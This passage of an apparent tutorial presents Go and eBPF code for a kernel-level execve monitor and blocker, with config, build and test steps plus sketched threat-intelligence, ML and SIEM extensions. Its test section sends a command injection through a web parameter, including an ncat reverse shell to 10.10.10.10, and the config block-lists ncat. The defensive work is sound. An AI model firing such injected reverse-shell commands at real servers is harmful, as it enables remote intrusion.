        return fmt.Errorf("data too short")
89
    }
90

91
    reader := bytes.NewReader(data)
92
    return binary.Read(reader, binary.LittleEndian, e)
93
}

Complete Go Implementation#

Click to view the complete Go program

1
//go:generate go run github.com/cilium/ebpf/cmd/bpf2go -cc clang -cflags $BPF_CFLAGS Adr adr.c
2

3
package main
4

5
import (
6
    "bytes"
7
    "encoding/binary"
8
    "errors"
9
    "fmt"
10
    "log"
11
    "os"
12
    "os/signal"
13
    "strings"
14
    "syscall"
15
    "time"
16
    "unsafe"
17

18
    "github.com/cilium/ebpf"
19
    "github.com/cilium/ebpf/link"
20
    "github.com/cilium/ebpf/ringbuf"
21
    "github.com/cilium/ebpf/rlimit"
22
    "github.com/fsnotify/fsnotify"
23
    "gopkg.in/yaml.v2"
24
)
25

26
type Config struct {
27
    Targets []Target `yaml:"targets"`
28
}
29

30
type Target struct {
31
    Type    string      `yaml:"type"`
32
    Value   interface{} `yaml:"value"`
33
    Actions Actions     `yaml:"actions"`
34
}
35

36
type Actions struct {
37
    Monitor bool `yaml:"monitor"`
38
    Block   bool `yaml:"block"`
39
}
40

41
type Event struct {
42
    UID       uint32
43
    PID       uint32
44
    PPID      uint32
45
    ArgsCount uint32
46
    ArgsSize  uint32
47
    Command   [32]byte
48
    Args      [384]byte
49
}
50

51
type TargetKey struct {
52
    Type     uint8
53
    Reserved [3]uint8
54
    Data     [32]byte
55
}
56

57
func main() {
58
    configFile := "config.yaml"
59
    if len(os.Args) > 1 {
60
        configFile = os.Args[1]
61
    }
62

63
    var config Config
64
    if err := loadConfig(configFile, &config); err != nil {
65
        log.Fatalf("Error loading config: %v", err)
66
    }
67

68
    if err := rlimit.RemoveMemlock(); err != nil {
69
        log.Fatalf("Failed to remove memlock: %v", err)
70
    }
71

72
    var objs adrObjects
73
    if err := loadAdrObjects(&objs, nil); err != nil {
74
        log.Fatalf("Error loading eBPF objects: %v", err)
75
    }
76
    defer objs.Close()
77

78
    currentTargets := populateMap(objs.Targets, config, nil)
79
    go watchConfig(configFile, objs.Targets, currentTargets)
80

81
    monProg := objs.MonitorSyscalls
82
    monLnk, err := link.Tracepoint("syscalls", "sys_enter_execve", monProg, nil)
83
    if err != nil {
84
        log.Fatalf("Failed to attach eBPF program: %v", err)
85
    }
86
    defer monLnk.Close()
87

88
    lsmProg := objs.EnforceExecve
89
    lsmLnk, err := link.AttachLSM(link.LSMOptions{
90
        Program: lsmProg,
91
    })
92
    if err != nil {
93
        log.Fatalf("Failed to attach eBPF program: %v", err)
94
    }
95
    defer lsmLnk.Close()
96

97
    log.Println("eBPF programs are attached successfully.")
98

99
    rd, err := ringbuf.NewReader(objs.Events)
100
    if err != nil {
101
        log.Fatalf("Failed to create ring buffer reader: %v", err)
102
    }
103
    defer rd.Close()
104

105
    sig := make(chan os.Signal, 1)
106
    signal.Notify(sig, syscall.SIGINT, syscall.SIGTERM)
107

108
    done := make(chan bool)
109
    go func() {
110
        log.Println("Listening for events...")
111
        for {
112
            record, err := rd.Read()
113
            if err != nil {
114
                if errors.Is(err, ringbuf.ErrFlushed) {
115
                    done <- true
116
                    break
117
                }
118
                log.Printf("Error reading from ring buffer: %v", err)
119
                continue
120
            }
121

122
            var event Event
123
            if err := event.UnmarshalBinary(record.RawSample); err != nil {
124
                log.Printf("Error unmarshaling event: %v", err)
125
                continue
126
            }
127

128
            log.Printf("Event: UID=%d PID=%d PPID=%d Command=%s",
129
                event.UID, event.PID, event.PPID, printArgs(&event))
130
        }
131
    }()
132

133
    <-sig
134
    log.Println("Received exit signal (Ctrl+C), starting timeout...")
135

136
    timeout := time.After(1 * time.Second)
137
    select {
138
    case <-timeout:
139
        log.Println("Timeout reached, closing reader...")
140
        if err := rd.Flush(); err != nil {
141
            log.Printf("Error flushing ring buffer: %v", err)
142
        }
143
    case <-done:
144
        log.Println("Reader finished early, exiting...")
145
    }
146

147
    log.Println("Exiting...")
148
}
149

150
func loadConfig(filename string, config *Config) error {
151
    data, err := os.ReadFile(filename)
152
    if err != nil {
153
        return err
154
    }
155
    return yaml.Unmarshal(data, config)
156
}
157

158
func populateMap(targetsMap *ebpf.Map, config Config, currentTargets map[TargetKey]uint8) map[TargetKey]uint8 {
159
    newTargets := make(map[TargetKey]uint8)
160

161
    for _, target := range config.Targets {
162
        key := TargetKey{}
163
        var value uint8
164

165
        if target.Actions.Monitor {
166
            value |= 0b10
167
        }
168
        if target.Actions.Block {
169
            value |= 0b01
170
        }
171

172
        switch target.Type {
173
        case "command":
174
            key.Type = 'c'
175
            if cmdStr, ok := target.Value.(string); ok {
176
                copy(key.Data[:], cmdStr)
177
                newTargets[key] = value
178
            }
179
        case "pid":
180
            key.Type = 'p'
181
            var pidValue uint32
182
            switch v := target.Value.(type) {
183
            case int:
184
                pidValue = uint32(v)
185
            case uint32:
186
                pidValue = v
187
            case float64:
188
                pidValue = uint32(v)
189
            }
190
            binary.LittleEndian.PutUint32(key.Data[:4], pidValue)
191
            newTargets[key] = value
192
        case "uid":
193
            key.Type = 'u'
194
            var uidValue uint32
195
            switch v := target.Value.(type) {
196
            case int:
197
                uidValue = uint32(v)
198
            case uint32:
199
                uidValue = v
200
            case float64:
201
                uidValue = uint32(v)
202
            }
203
            binary.LittleEndian.PutUint32(key.Data[:4], uidValue)
204
            newTargets[key] = value
205
        }
206
    }
207

208
    if currentTargets != nil {
209
        for key := range currentTargets {
210
            if _, exists := newTargets[key]; !exists {
211
                targetsMap.Delete(unsafe.Pointer(&key))
212
            }
213
        }
214
    }
215

216
    for key, value := range newTargets {
217
        err := targetsMap.Update(unsafe.Pointer(&key), unsafe.Pointer(&value), ebpf.UpdateAny)
218
        if err != nil {
219
            log.Printf("Error updating map: %v", err)
220
        }
221
    }
222

223
    log.Printf("Loaded %d targets", len(newTargets))
224
    return newTargets
225
}
226

227
func watchConfig(configFile string, targetsMap *ebpf.Map, currentTargets map[TargetKey]uint8) {
228
    watcher, err := fsnotify.NewWatcher()
229
    if err != nil {
230
        log.Fatalf("Failed to create file watcher: %v", err)
231
    }
232
    defer watcher.Close()
233

234
    if err := watcher.Add(configFile); err != nil {
235
        log.Fatalf("Failed to watch config file: %v", err)
236
    }
237

238
    for {
239
        select {
240
        case event, ok := <-watcher.Events:
241
            if !ok {
242
                return
243
            }
244
            if event.Op.Has(fsnotify.Write) {
245
                log.Println("Config file changed, reloading...")
246
                time.Sleep(1 * time.Second)
247

248
                var config Config
249
                if err := loadConfig(event.Name, &config); err != nil {
250
                    log.Printf("Error reloading config: %v", err)
251
                    continue
252
                }
253
                populateMap(targetsMap, config, currentTargets)
254
            }
255
        case err := <-watcher.Errors:
256
            log.Printf("File watcher error: %v", err)
257
        }
258
    }
259
}
260

261
func printArgs(event *Event) string {
262
    if event.ArgsSize == 0 {
263
        return ""
264
    }
265

266
    args := make([]string, 0, event.ArgsCount)
267
    data := event.Args[:event.ArgsSize]
268

269
    start := 0
270
    for i := 0; i < int(event.ArgsCount) && start < len(data); i++ {
271
        end := start
272
        for end < len(data) && data[end] != 0 {
273
            end++
274
        }
275

276
        if end > start {
277
            args = append(args, string(data[start:end]))
278
        }
279

280
        start = end + 1
281
    }
282

283
    return strings.Join(args, " ")
284
}
285

286
func (e *Event) UnmarshalBinary(data []byte) error {
287
    if len(data) < int(unsafe.Sizeof(*e)) {
288
        return fmt.Errorf("data too short")
289
    }
290

291
    reader := bytes.NewReader(data)
292
    return binary.Read(reader, binary.LittleEndian, e)
293
}

Compiling and Running#

Build Process#

1
# Generate eBPF Go bindings
2
go generate
3

4
# Build the ADR application
5
go build -o adr-monitor .
6

7
# Create configuration file
8
cat > config.yaml << EOF
9
targets:
10
  - type: "command"
11
    value: "/usr/bin/whoami"
12
    actions:
13
      block: false
14
      monitor: true
15
  - type: "command"
16
    value: "/bin/ncat"
17
    actions:
18
      block: true
19
      monitor: true
20
  - type: "uid"
21
    value: 1000
22
    actions:
23
      monitor: true
24
      block: false
25
EOF
26

27
# Run the ADR system (requires root privileges)
28
sudo ./adr-monitor config.yaml

Testing the System#

1
# Terminal 1: Start the vulnerable web server
2
go run vulnerable-server.go
3

4
# Terminal 2: Start the ADR monitor
5
sudo ./adr-monitor config.yaml
6

7
# Terminal 3: Test attacks
8
# This should be allowed (whitelisted)
9
curl "http://localhost:8080/?cmd=whoami"
10

11
# This should be blocked (blacklisted)
12
curl "http://localhost:8080/?cmd=ncat 10.10.10.10 9001 -e sh"
13

14
# This should be monitored (based on UID rules)
15
curl "http://localhost:8080/?cmd=ls -la"

Expected Behavior#

1
# ADR Monitor Output:
2
2024-12-20 10:15:23 - [INFO] eBPF programs attached successfully
3
2024-12-20 10:15:23 - [INFO] Listening for security events...
4
2024-12-20 10:15:45 - [SECURITY EVENT] UID=33 PID=12345 PPID=12344 Command=whoami Args=whoami
5
2024-12-20 10:15:52 - [SECURITY EVENT] UID=33 PID=12346 PPID=12344 Command=ncat BLOCKED
6
2024-12-20 10:16:03 - [SECURITY EVENT] UID=33 PID=12347 PPID=12344 Command=ls Args=ls -la

Advanced Features and Extensions#

Threat Intelligence Integration#

1
// Enhanced security event processing with threat intelligence
2
type ThreatIntelligence struct {
3
    KnownMaliciousCommands map[string]ThreatLevel
4
    SuspiciousPatterns     []regexp.Regexp
5
    IPReputation          map[string]ThreatLevel
6
}
7

8
type ThreatLevel int
9

10
const (
11
    Low ThreatLevel = iota
12
    Medium
13
    High
14
    Critical
15
)
16

17
func (ti *ThreatIntelligence) AnalyzeEvent(event *Event) ThreatAssessment {
18
    assessment := ThreatAssessment{
19
        Level:       Low,
20
        Indicators:  []string{},
21
        Recommended: []string{},
22
    }
23

24
    command := strings.TrimRight(string(event.Command[:]), "\x00")
25

26
    // Check against known malicious commands
27
    if level, exists := ti.KnownMaliciousCommands[command]; exists {
28
        assessment.Level = level
29
        assessment.Indicators = append(assessment.Indicators,
30
            fmt.Sprintf("Known malicious command: %s", command))
31
    }
32

33
    // Check for suspicious patterns
34
    args := parseArgs(event)
35
    for _, pattern := range ti.SuspiciousPatterns {
36
        if pattern.MatchString(args) {
37
            assessment.Level = max(assessment.Level, Medium)
38
            assessment.Indicators = append(assessment.Indicators,
39
                fmt.Sprintf("Suspicious pattern detected: %s", pattern.String()))
40
        }
41
    }
42

43
    return assessment
44
}

Machine Learning Integration#

1
// ML-based anomaly detection
2
type AnomalyDetector struct {
3
    ModelEndpoint string
4
    Threshold     float64
5
}
6

7
func (ad *AnomalyDetector) DetectAnomaly(event *Event) (bool, float64, error) {
8
    features := extractFeatures(event)
9

10
    payload := map[string]interface{}{
11
        "features": features,
12
    }
13

14
    response, err := http.Post(ad.ModelEndpoint, "application/json",
15
        bytes.NewBuffer(jsonPayload))
16
    if err != nil {
17
        return false, 0, err
18
    }
19
    defer response.Body.Close()
20

21
    var result struct {
22
        AnomalyScore float64 `json:"anomaly_score"`
23
    }
24

25
    if err := json.NewDecoder(response.Body).Decode(&result); err != nil {
26
        return false, 0, err
27
    }
28

29
    return result.AnomalyScore > ad.Threshold, result.AnomalyScore, nil
30
}
31

32
func extractFeatures(event *Event) []float64 {
33
    // Extract relevant features for ML model
34
    return []float64{
35
        float64(event.UID),
36
        float64(event.ArgsCount),
37
        float64(event.ArgsSize),
38
        // Add more relevant features
39
    }
40
}

SIEM Integration#

1
// SIEM integration for enterprise environments
2
type SIEMConnector struct {
3
    Endpoint string
4
    APIKey   string
5
    Format   string
6
}
7

8
func (sc *SIEMConnector) SendAlert(event *Event, assessment ThreatAssessment) error {
9
    alert := map[string]interface{}{
10
        "timestamp":    time.Now().Unix(),
11
        "event_type":   "security_violation",
12
        "severity":     assessment.Level,
13
        "source_ip":    getSourceIP(event),
14
        "user_id":      event.UID,
15
        "process_id":   event.PID,
16
        "command":      extractCommand(event),
17
        "indicators":   assessment.Indicators,
18
        "raw_event":    event,
19
    }
20

21
    return sc.sendToSIEM(alert)
22
}

Conclusion#

As cyber threats continue to evolve and become more sophisticated, traditional perimeter-based security measures are no longer sufficient to protect critical applications and data. The ADR (Application Detection and Response) technology, powered by eBPF, offers a reliable, intelligent, and proactive approach to application security that operates at the kernel level with minimal performance impact.

Key Benefits of eBPF-based ADR#

1
graph TB
2
    subgraph "ADR Security Benefits"
3
        A["Real-time Protection"] --> A1["Immediate threat detection"]
4
        A --> A2["Microsecond response times"]
5
        A --> A3["Zero-day vulnerability protection"]
6

7
        B["Deep Visibility"] --> B1["System call monitoring"]
8
        B --> B2["Process behavior analysis"]
9
        B --> B3["Comprehensive audit trails"]
10

11
        C["Minimal Impact"] --> C1["Kernel-level efficiency"]
12
        C --> C2["Low CPU overhead"]
13
        C --> C3["No application modifications"]
14

15
        D["Advanced Detection"] --> D1["Behavioral analysis"]
16
        D --> D2["Pattern recognition"]
17
        D --> D3["Machine learning integration"]
18
    end
19

20
    style A fill:#c8e6c9
21
    style B fill:#e1f5fe
22
    style C fill:#fff3e0
23
    style D fill:#f3e5f5

Strategic Advantages:

Proactive Defense: Detects and prevents attacks before system compromise
Context Awareness: Understands application behavior and legitimate operations
Evasion Resistance: Cannot be bypassed through traditional WAF evasion techniques
Scalable Deployment: Works across containerized and traditional environments
Integration Ready: Seamlessly integrates with existing security infrastructure

Future Enhancements#

The ADR system can be extended with additional capabilities:

Container-Aware Monitoring: Kubernetes and Docker integration
Network Behavior Analysis: Combined system call and network monitoring
Advanced ML Models: Behavioral anomaly detection and prediction
Automated Response: Integration with SOAR platforms for automated remediation
Compliance Reporting: Automated generation of security compliance reports

Implementation Recommendations#

Start Small: Begin with monitoring-only mode to understand normal application behavior
Gradual Rollout: Implement blocking rules incrementally after thorough testing
Baseline Establishment: Create comprehensive baselines of legitimate application behavior
Continuous Tuning: Regularly update rules based on threat intelligence and false positive analysis
Team Training: Ensure security teams understand eBPF-based monitoring capabilities

By leveraging eBPF technology for Application Detection and Response, organizations can significantly strengthen their security posture, minimize attack surface exposure, and stay ahead of emerging threats while maintaining optimal application performance and user experience.